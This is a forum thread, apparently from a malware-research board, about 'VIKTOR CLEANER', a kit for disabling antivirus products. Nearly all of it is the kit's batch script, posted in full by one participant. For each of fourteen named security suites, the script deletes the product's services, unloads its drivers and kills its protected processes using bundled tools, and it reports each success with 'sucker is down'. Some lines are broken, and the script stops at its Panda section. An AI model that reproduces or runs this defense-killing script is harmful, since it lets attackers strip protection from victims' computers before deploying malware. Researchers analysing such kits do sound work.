[Hoax] VIKTOR CLEANER

Topic locked
#15971 by x4r0r
Sat Oct 13, 2012 2:26 am
I saw a tutorial on youtube ... i share it with all , http://www.youtube.com/watch?v=YcXqGq6uejk&feature=plcp :D , Closes the antivirus , without the need to restart , or re-open the antivirus , when he has closed, I hope you enjoy this video ... 4:08

PD: The tutorial video is not mine , i found on the internet
Username
x4r0r
Posts
1
Joined
Sat Oct 13, 2012 1:47 am
Re: Kaspersky Antivirus 2013 bypass and full unload from mem

#16089 by hanan
Wed Oct 17, 2012 6:48 pm
seems like you can get the kit at http://astr0baby.wordpress.com/2012/07/ ... eaner-1-2/.
Username
hanan
Posts
44
Joined
Wed Jul 11, 2012 5:26 pm
Re: Kaspersky Antivirus 2013 bypass and full unload from mem

#18237 by kmd
Mon Feb 18, 2013 3:53 am
anyone managed to decrypt this? :D boris seems not work:)
Username
kmd
Posts
271
Joined
Mon Mar 15, 2010 4:09 am
Location
Russian Federation
Re: Kaspersky Antivirus 2013 bypass and full unload from mem

#18238 by EP_X0FF
Mon Feb 18, 2013 5:26 am
kmd wrote:anyone managed to decrypt this? :D boris seems not work:)
Password posted in his blog as text to link.

What about it contents of this archive, well
Code: Select all
ECHO OFF 
CLS 
:MENU 
CLS
ECHO ....Astr0baby 2012.... 
ECHO **********************
ECHO * VIKTOR CLEANER 1.2 *
ECHO **********************
ECHO .
ECHO 1 - Kill Bitdefender 2012 
ECHO 2 - Kill MS Essentials 
ECHO 3 - Kill Kaspersky 2012 
ECHO 4 - Kill Avast! Internet Security 2012  
ECHO 5 - Kill F-Secure 2012 
ECHO 6 - Kill Eset Smart Security 5
ECHO 7 - Kill AVG Internet Security 2012 
ECHO 8 - Kill Norton IS 2013
ECHO 9 - Kill TrendMicro Titanium Security 2012
ECHO a - Kill McAfee 2012 
ECHO b - Kill G-Data 2013 
ECHO c - Kill Comodo IS pro 2012 
ECHO d - Kill Webroot SecureAnywhere complete
ECHO e - Kill Panda Antivirus Pro 2012 
ECHO 0 - Exit
ECHO .
SET /P attack=Choose the target:

IF "%attack%"=="1" GOTO BITDEFENDER 
IF "%attack%"=="2" GOTO ESSENTIALS 
IF "%attack%"=="3" GOTo KAV
IF "%attack%"=="4" GOTO AVAST  
IF "%attack%"=="5" GOTO FSECURE 
IF "%attack%"=="6" GOTO ESET
IF "%attack%"=="7" GOTO AVG 
IF "%attack%"=="8" GOTO NORTON
IF "%attack%"=="9" GOTO TREND
IF "%attack%"=="a" GOTO MCAFEE
IF "%attack%"=="b" GOTO GDATA 
IF "%attack%"=="c" GOTO COMODO
IF "%attack%"=="d" GOTO ROOT
IF "%attack%"=="e" GOTO PANDA
IF "%attack%"=="0" GOTO EOF 

goto :menu

:BITDEFENDER
cls
@echo off
echo Killing BitDefender...
mkdir c:\viktor 
del c:\viktor\*.* /Q 
viktor.exe /Q /T:C:\viktor /C
@ping 192.168.0.1 -n 1 -w %2000 > nul
cd c:\viktor 
@ping 192.168.0.1 -n 1 -w %5000 > nul
C:\viktor\rundll32 mssftl.dll stpprvs
C:\viktor\rundll32 mssftl.dll fsksf
C:\viktor\driverctrl.exe -unload bdfwfpf
@ping 192.168.0.1 -n 1 -w %5000 > nul 
@taskkill /IM bdagent.exe /F > nul 
@ping 192.168.0.1 -n 1 -w %5000 > nul
@taskkill /IM updatesrv.exe /F > nul 
@ping 192.168.0.1 -n 1 -w %5000 > nul
@taskkill /IM seccenter.exe /F > nul 
del *.* /Q
cd ..
rmdir viktor 
echo Done ...sucker is down .... 
@ping 192.168.0.1 -n 1 -w %5000 > nul
GOTO MENU 

:ESSENTIALS
cls 
@echo off
echo "Killing Endpoint/Security Essentials...." 
sc stop msmpsvc 
taskkill /F /IM msseces.exe /T 
echo "Done.. sucker is down..."
@ping 192.168.0.1 -n 1 -w %5000 > nul
GOTO MENU 

:KAV 
cls
@echo off
echo "Killing Kaspersky 2012...." 
mkdir c:\viktor 
del c:\viktor\*.* /Q
viktor.exe /Q /T:C:\viktor /C
cd C:\viktor
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq avp.exe"') do set PID=%%i
ping 127.0.0.1 -n 3 > nul
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype service -cobject AVP -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype process -cobject %PID% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq avp.exe"') do set SYSPID=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul 
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %SYSPID% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul
@taskkill /IM sidebar.exe > nul
echo "Done ...sucker is down ..." 
@ping 192.168.0.1 -n 1 -w %5000 > nul
del *.* /Q
cd ..
rmdir viktor
GOTO MENU
:AVAST 
cls
@echo off
echo "Killing Avast! Internet Security 2012...." 
mkdir c:\viktor 
del c:\viktor\*.* /Q
viktor.exe /Q /T:C:\viktor /C
cd C:\viktor
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq AvastSvc.exe"') do set PID=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype service -cobject AvastSvc -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype process -cobject %PID% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq afwServ.exe"') do set PID2=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul 
c:\viktor\processhacker.exe -s -phsvc -c -ctype service -cobject avast! Firewall -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %PID2% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul
sc stop "avast! antivirus" > nul 
@ping 192.168.0.1 -n 1 -w %5000 > nul
sc stop "avast! firewall" > nul 
@ping 192.168.0.1 -n 1 -w %5000 > nul
sc stop "afwServ
@ping 192.168.0.1 -n 1 -w %5000 > nul
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq AvastUI.exe"') do set PID3=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul 
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %PID3% -caction terminate
@taskkill /IM AvastUI.exe > nul
echo "Done ...sucker is down ..." 
@ping 192.168.0.1 -n 1 -w %5000 > nul
del *.* /Q
cd ..
rmdir viktor
GOTO MENU

:FSECURE 
cls
@echo off
echo "Killing F-Secure AV 2012...." 
mkdir c:\viktor 
del c:\viktor\*.* /Q
viktor.exe /Q /T:C:\viktor /C
cd C:\viktor
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq fshoster32.exe"') do set PID=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype service -cobject fshoster -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype process -cobject %PID% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq FSMA32.EXE"') do set PID2=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul 
c:\viktor\processhacker.exe -s -phsvc -c -ctype service -cobject FSMA -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %PID2% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq fsgk32.exe"') do set PID3=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul 
c:\viktor\processhacker.exe -s -phsvc -c -ctype service -cobject FSDFWD -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %PID3% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq Fshoster32.exe"') do set PID4=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul 
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %PID4% -caction terminate
@taskkill /IM FSM32.EXE > nul
echo "Done ...sucker is down ..." 
@ping 192.168.0.1 -n 1 -w %5000 > nul
del *.* /Q
cd ..
rmdir viktor
GOTO MENU

:ESET 
cls
@echo off
echo "Killing Eset Smart Security 5...." 
mkdir c:\viktor 
del c:\viktor\*.* /Q
viktor.exe /Q /T:C:\viktor /C
cd C:\viktor
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq ekrn.exe"') do set PID=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype service -cobject ekrn -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype process -cobject %PID% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq egui.exe"') do set PID2=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul 
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %PID2% -caction terminate
echo "Done ...sucker is down ..." 
@ping 192.168.0.1 -n 1 -w %5000 > nul
del *.* /Q 
cd ..
@ping 192.168.0.1 -n 1 -w %5000 > nul
rmdir viktor
GOTO MENU

:AVG 
cls
@echo off
echo "Killing AVG Internet Security 2012...." 
mkdir c:\viktor 
del c:\viktor\*.* /Q
viktor.exe /Q /T:C:\viktor /C
cd C:\viktor
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq avgemcx.exe"') do set PID=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype service -cobject avgemcx -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype process -cobject %PID% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul

FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq ekrn.exe"') do set PID1=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype service -cobject ekrn -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype process -cobject %PID1% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul

FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq avgfws.exe"') do set PID2=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype service -cobject avgfws -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype process -cobject %PID2% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > n\

FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq avgidsagent.exe"') do set PID3=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype service -cobject AVGIDSAgent -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype process -cobject %PID3% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > n\

FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq avgnsx.exe"') do set PID4=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype service -cobject avgnsx -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype process -cobject %PID4% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > n\

FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq avgrsx.exe"') do set PID5=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype service -cobject avgrsx -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype process -cobject %PID5% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > n\

FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq avgcsrvx.exe"') do set PID6=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype service -cobject avgcsrvx -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype process -cobject %PID6% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > n\

FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq avgcsrvx.exe"') do set PID7=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype service -cobject avgcsrvx -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype process -cobject %PID7% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > n\

FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq avgtray.exe"') do set PID8=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul 
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %PID8% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > n\

FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq avgwdsvc.exe"') do set PID9=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype service -cobject avgwd -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq avgmcx.exe"') do set PIDA=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype process -cobject %PIDA% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul
@taskkill /IM avgui.exe /F > nul 
@ping 192.168.0.1 -n 1 -w %5000 > nul
@taskkill /IM avgemcx.exe /F > nul
@ping 192.168.0.1 -n 1 -w %5000 > nul
@taskkill /IM sidebar.exe /F > nul
del *.* /Q
cd ..
@ping 192.168.0.1 -n 1 -w %5000 > nul
rmdir viktor
GOTO MENU

:NORTON 
cls
@echo off
echo "Killing Norton Internet Security 2013...." 
mkdir c:\viktor 
del c:\viktor\*.* /Q
viktor.exe /Q /T:C:\viktor /C
cd C:\viktor
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq ccSvcHst.exe"') do set PID=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype process -cobject %PID% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq ccSvcHst.exe"') do set PID2=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul 
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %PID2% -caction terminate
echo "Done ...sucker is down ..." 
@ping 192.168.0.1 -n 1 -w %5000 > nul
del *.* /Q 
cd ..
@ping 192.168.0.1 -n 1 -w %5000 > nul
rmdir viktor
GOTO MENU

:TREND
cls
@echo off
echo "Killing TrendMicro Titanius Security 2012...." 
mkdir c:\viktor 
del c:\viktor\*.* /Q
viktor.exe /Q /T:C:\viktor /C
cd C:\viktor
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq coreFrameworkHost.exe"') do set PID=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype process -cobject %PID% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq coreServiceShell.exe"') do set PID2=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul 
c:\viktor\processhacker.exe -s -phsvc -c -ctype service -cobject amsp -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul 
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %PID2% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul 
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq uiwatchdog.exe"') do set PID3=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %PID3% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq uiWinMgr.exe "') do set PID4=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %PID4% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul
del *.* /Q 
cd ..
@ping 192.168.0.1 -n 1 -w %5000 > nul
rmdir viktor
GOTO MENU


:MCAFEE 
cls
@echo off
echo "Killing McAfee Antivirus 2012...." 
mkdir c:\viktor 
del c:\viktor\*.* /Q
viktor.exe /Q /T:C:\viktor /C
cd C:\viktor
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq McSvHost.exe"') do set PID=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul 
c:\viktor\processhacker.exe -s -phsvc -c -ctype service -cobject McNaiAnn -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul 
c:\viktor\processhacker.exe -s -phsvc -c -ctype service -cobject mcmscsvc -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul 
c:\viktor\processhacker.exe -s -phsvc -c -ctype service -cobject mcproxy -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul 
c:\viktor\processhacker.exe -s -phsvc -c -ctype service -cobject mcnasvc -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul 
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %PID% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul 

FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq mfevtps.exe"') do set PID3=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype service -cobject mfevtp -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %PID3% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul

FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq mcshield.exe"') do set PID4=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype service -cobject McShield -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %PID4% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul

FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq mfefire.exe"') do set PID5=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype service -cobject mfefire -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %PID5% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul

FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq mcods.exe"') do set PID6=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype service -cobject McODS -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %PID6% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul

FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq mcagent.exe "') do set PID7=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %PID7% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul

FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq mfevtps.exe"') do set PID9=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype service -cobject mfevtps -caction stop
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype service -cobject mfevtps -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %PID9% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq mcshield.exe"') do set PID4=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype service -cobject McShield -caction stop
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %PID4% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul

@C:\viktor\catchme.exe -l c:\viktor\log -u -c "C:\Program Files\Common Files\Mcafee\SystemCore\mcshield.exe" "C:\viktor\mcshield.exe" > nul
@ping 192.168.0.1 -n 1 -w %5000 > nul
@c:\viktor\catchme.exe -l c:\viktor\log -u -K "C:\Program Files\Common Files\Mcafee\SystemCore\mcshield.exe" > nul
@ping 192.168.0.1 -n 1 -w %5000 > nul
@c:\viktor\catchme.exe -l c:\viktor\log -u -E "C:\Program Files\Common Files\Mcafee\SystemCore\mcshield.exe" > nul
@ping 192.168.0.1 -n 1 -w %5000 > nul
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq mcshield.exe"') do set PID4=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype service -cobject McShield -caction stop
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %PID4% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul

@c:\viktor\catchme.exe -l c:\viktor\log -u -c C:\windows\system32\mfevtps.exe C:\viktor\mfevtps.exe  > nul
@ping 192.168.0.1 -n 1 -w %5000 > nul
@c:\viktor\catchme.exe -l c:\viktor\log -u -K C:\windows\system32\mfevtps.exe > nul
@ping 192.168.0.1 -n 1 -w %5000 > nul
@c:\viktor\catchme.exe -l c:\viktor\log -u -E C:\windows\system32\mfevtps.exe > nul
@ping 192.168.0.1 -n 1 -w %5000 > nul

FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq mfevtps.exe"') do set PID9=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype service -cobject mfevtps -caction stop
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype service -cobject mfevtps -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %PID9% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul

del *.* /Q 
cd ..
@ping 192.168.0.1 -n 1 -w %5000 > nul

GOTO MENU

:GDATA 
cls
@echo off
echo "Killing G Data AV 2013 ...." 
mkdir c:\viktor 
del c:\viktor\*.* /Q
viktor.exe /Q /T:C:\viktor /C
cd C:\viktor
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq GDScan.exe"') do set PID=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype service -cobject gdscan -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype process -cobject %PID% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq AVKProxy.exe"') do set PID2=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul 
c:\viktor\processhacker.exe -s -phsvc -c -ctype service -cobject avkproxy -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul 
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %PID2% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul 
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq AVKWctl.exe"') do set PID3=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype service -cobject avkwctl -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %PID3% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq AVKService.exe "') do set PID4=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype service -cobject avkservice -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %PID4% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq AVKTray.exe "') do set PID5=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %PID5% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq GDSC.exe "') do set PID6=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %PID6% -caction terminate

del *.* /Q 
cd ..
@ping 192.168.0.1 -n 1 -w %5000 > nul
rmdir viktor
GOTO MENU

:COMODO 
cls
@echo off
echo "Killing Comodo Internet Secuirty Pro 2012 ...." 
mkdir c:\viktor 
del c:\viktor\*.* /Q
viktor.exe /Q /T:C:\viktor /C
cd C:\viktor
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq dragon_updater.exe"') do set PID=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype service -cobject DragonUpdater -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype process -cobject %PID% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq cmdagent.exe"') do set PID2=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul 
c:\viktor\processhacker.exe -s -phsvc -c -ctype service -cobject cmdAgent -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul 
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %PID2% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul 
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq CLPSLS.exe"') do set PID3=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype service -cobject CLPSLS -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %PID3% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq CLPS.exe"') do set PID4=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype process -cobject %PID4% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq cfp.exe"') do set PID5=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe -s -phsvc -c -ctype process -cobject %PID5% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul
del *.* /Q 
cd ..
rmdir viktor
GOTO MENU

:ROOT 
cls
@echo off
echo "Killing Webroot SecureAnywhere Complete ...." 
mkdir c:\viktor 
del c:\viktor\*.* /Q
viktor.exe /Q /T:C:\viktor /C
cd C:\viktor
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq WRSA.exe"') do set PID=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe  -c -ctype service -cobject WRSVC -caction delete
@ping 192.168.0.1 -n 1 -w %5000 > nul
c:\viktor\processhacker.exe  -c -ctype process -cobject %PID% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq WRSA.exe"') do set SYSPID=%%i
@ping 192.168.0.1 -n 1 -w %5000 > nul 
c:\viktor\processhacker.exe -s   -c -ctype process -cobject %SYSPID% -caction terminate
@ping 192.168.0.1 -n 1 -w %5000 > nul
del *.* /Q 
cd ..
rmdir viktor
GOTO MENU

:PANDA 
cls
@echo off
echo "Killing Panda Antivirus Pro 2012...." 
